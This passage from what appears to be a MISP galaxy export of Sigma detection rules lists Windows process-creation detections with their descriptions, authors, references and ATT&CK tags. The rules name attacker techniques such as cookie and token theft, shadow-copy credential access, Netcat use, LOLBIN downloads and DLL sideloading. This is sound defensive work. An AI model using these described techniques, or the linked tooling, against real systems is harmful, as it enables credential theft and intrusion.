Which is a technique often used to perform browser injection attacks", "meta": { "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_remote_debugging.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/defaultnamehere/cookie_crimes/", "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", "https://github.com/wunderwuzzi23/firefox-cookiemonster", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_remote_debugging.yml" ], "tags": [ "attack.credential-access", "attack.t1185" ] }, "related": [ { "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", "value": "Browser Started with Remote Debugging" }, { "description": "Detects the execution of a renamed Microsoft Teams binary.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-07-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_msteams.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msteams.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "88f46b67-14d4-4f45-ac2c-d66984f22191", "value": "Renamed Microsoft Teams Execution" }, { "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", "meta": { "author": "Sittikorn S", "creation_date": "2021-06-22", "falsepositive": [ "Software that 
illegally integrates MegaSync in a renamed form", "Administrators that have renamed MegaSync" ], "filename": "proc_creation_win_renamed_megasync.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/rclone-mega-extortion/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", "value": "Renamed MegaSync Execution" }, { "description": "Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe.\nAutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks.\nAttackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. 
A renamed AutoIt executable is particularly suspicious.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-06-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_autoit.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.autoitscript.com/site/", "https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_autoit.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f4264e47-f522-4c38-a420-04525d5b880f", "value": "Renamed AutoIt Execution" }, { "description": "Detects execution of LiveKD based on PE metadata or image name", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "Administration and debugging activity (must be investigated)" ], "filename": "proc_creation_win_sysinternals_livekd_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/livekd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_livekd_execution.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "a85f7765-698a-4088-afa0-ecfbf8d01fa4", "value": "Potential Memory Dumping Activity Via LiveKD" }, { "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", "meta": { "author": "frack113", "creation_date": "2022-04-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msiexec_embedding.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": 
"windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml" ], "tags": [ "attack.t1218.007", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469", "value": "Suspicious MsiExec Embedding Parent" }, { "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_kavremover_uncommon_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_kavremover_uncommon_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d047726b-c71c-4048-a99b-2e2f50dc107d", "value": "Kavremover Dropped Binary LOLBIN Usage" }, { "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-19", "falsepositive": [ "Unknown" ], "filename": 
"proc_creation_win_renamed_netsupport_rat.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "0afbd410-de03-4078-8491-f132303cb67d", "value": "Renamed NetSupport RAT Execution" }, { "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2021-07-21", "falsepositive": [ "Legitimate ncat use" ], "filename": "proc_creation_win_pua_netcat.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://www.revshells.com/", "https://nmap.org/ncat/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_netcat.yml" ], "tags": [ "attack.command-and-control", "attack.t1095" ] }, "related": [ { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "value": "PUA - Netcat Suspicious Execution" }, { "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", "meta": { "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "creation_date": "2020-03-04", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml", "level": "high", 
"logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml" ], "tags": [ "attack.execution", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", "value": "MMC20 Lateral Movement" }, { "description": "Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag", "meta": { "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Legitimate administrator or user executes a service for legitimate reasons." 
], "filename": "proc_creation_win_net_start_service.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_start_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", "value": "Start Windows Service Via Net.EXE" }, { "description": "Detects shadow copy creation using operating system utilities, which may indicate credential access (for example, copying locked files such as NTDS.dit or the SAM hive from the snapshot)", "meta": { "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Legitimate administrator working with shadow copies, access for backup purposes" ], "filename": "proc_creation_win_susp_shadow_copies_creation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_creation.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1003.002", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { 
"dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "value": "Shadow Copies Creation Using Operating Systems Utilities" }, { "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-02", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ebea773c-a8f1-42ad-a856-00cb221966e8", "value": "DLL Sideloading by VMware Xfer Utility" }, { "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", "meta": { "author": "frack113", "creation_date": "2022-04-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", 
"https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml" ], "tags": [ "attack.credential-access", "attack.t1539", "attack.collection", "attack.t1005" ] }, "related": [ { "dest-uuid": "10ffac09-e42d-4f56-ab20-db94c67d76ff", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", "value": "SQLite Firefox Profile Data DB Access" }, { "description": "Detects the use of path traversal in the conhost.exe command line, indicating possible command/argument confusion or hijacking (indirect command execution)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-14", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_conhost_path_traversal.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2020/07/06/indirect-command-execution/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39", "value": "Conhost.exe CommandLine Path Traversal" }, { "description": "Detects a renamed \"dctask64.exe\" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central.\nThis binary can be abused for DLL injection, arbitrary command and process execution.\n", "meta": { "author": "Florian Roth (Nextron Systems), 
Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-01-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_dctask64.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222088214581825540", "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://twitter.com/gN3mes1s/status/1222095371175911424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1055.001", "attack.t1202", "attack.t1218" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", "value": "Renamed ZOHO Dctask64 Execution" }, { "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hwp_exploits.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", "https://blog.alyac.co.kr/1901", "https://twitter.com/cyberwar_15/status/1187287262054076416", 
"https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", "https://en.wikipedia.org/wiki/Hangul_(word_processor)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001", "attack.execution", "attack.t1203", "attack.t1059.003", "attack.g0032" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "023394c4-29d5-46ab-92b8-6a534c6f447b", "value": "Suspicious HWP Sub Processes" }, { "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", "meta": { "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-09-24", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", "https://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-a-technical-deep-dive", "https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/", "https://twitter.com/0gtweet/status/1299071304805560321?s=21", "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", "value": "Process Memory Dump via RdrLeakDiag.EXE" }, { "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-08", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_pua_iox.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/EddieIvan01/iox", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_iox.yml" ], "tags": [ "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", "value": "PUA- IOX Tunneling Tool Execution" }, { "description": "Detects the execution of Xwizard tool from a non-default directory.\nWhen executed from a non-default directory, this utility can be abused in order to side load a custom version of \"xwizards.dll\".\n", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-09-20", "falsepositive": [ "Windows installed on non-C drive" ], "filename": "proc_creation_win_xwizard_execution_non_default_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xwizard_execution_non_default_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "value": "Xwizard.EXE Execution From Non-Default Location" }, { "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ldifde_export.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html", "https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_export.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "4f7a6757-ff79-46db-9687-66501a02d9ec", "value": "Active Directory Structure Export Via Ldifde.EXE" }, { "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. 
Often used by attackers so that ransomware can run in Safe Mode, where some security products do not run", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-02", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_reg_add_safeboot.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "value": "Add SafeBoot Keys Via Reg Utility" }, { "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)\n", "meta": { "author": "frack113", "creation_date": "2021-07-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_protocolhandler_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_protocolhandler_download.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "value": "File Download Using 
ProtocolHandler.exe" }, { "description": "Detects execution of commands that leverage the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)", "creation_date": "2022-08-14", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt", "https://twitter.com/n1nj4sec/status/1421190238081277959", "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", "value": "Mshtml.DLL RunHTMLApplication Suspicious Usage" }, { "description": "Detects a ping command that uses a hex encoded IP address", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-03-23", "falsepositive": [ "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "filename": "proc_creation_win_ping_hex_ip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/vysecurity/status/977198418354491392", "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ping_hex_ip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140", "attack.t1027" ] }, "related": [ { "dest-uuid": 
"3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", "value": "Ping Hex IP" }, { "description": "Detects execution of \"odbcconf\" with the \"-f\" flag in order to load a response file with a non-\".rsp\" extension.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-22", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_odbcconf_response_file_susp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d32dd6f-3196-4093-b9eb-1ad8ab088ca5", "value": "Suspicious Response File Execution Via Odbcconf.EXE" }, { "description": "Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sndvol_susp_child_processes.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Max_Mal_/status/1661322732456353792", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sndvol_susp_child_processes.yml" ], "tags": [ "attack.execution" ] }, "uuid": "ba42babc-0666-4393-a4f7-ceaf5a69191e", "value": "Uncommon Child Processes Of SndVol.exe" }, { "description": "Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.\nThe database might contain authentication tokens and other sensitive information about the logged in accounts.\n", "meta": { "author": "@SerkinValery", "creation_date": "2022-09-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", "value": "Potentially Suspicious Command Targeting Teams Sensitive Files" }, { "description": "Detects usage of \"msedge_proxy.exe\" to download arbitrary files", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-11-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msedge_proxy_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/", 
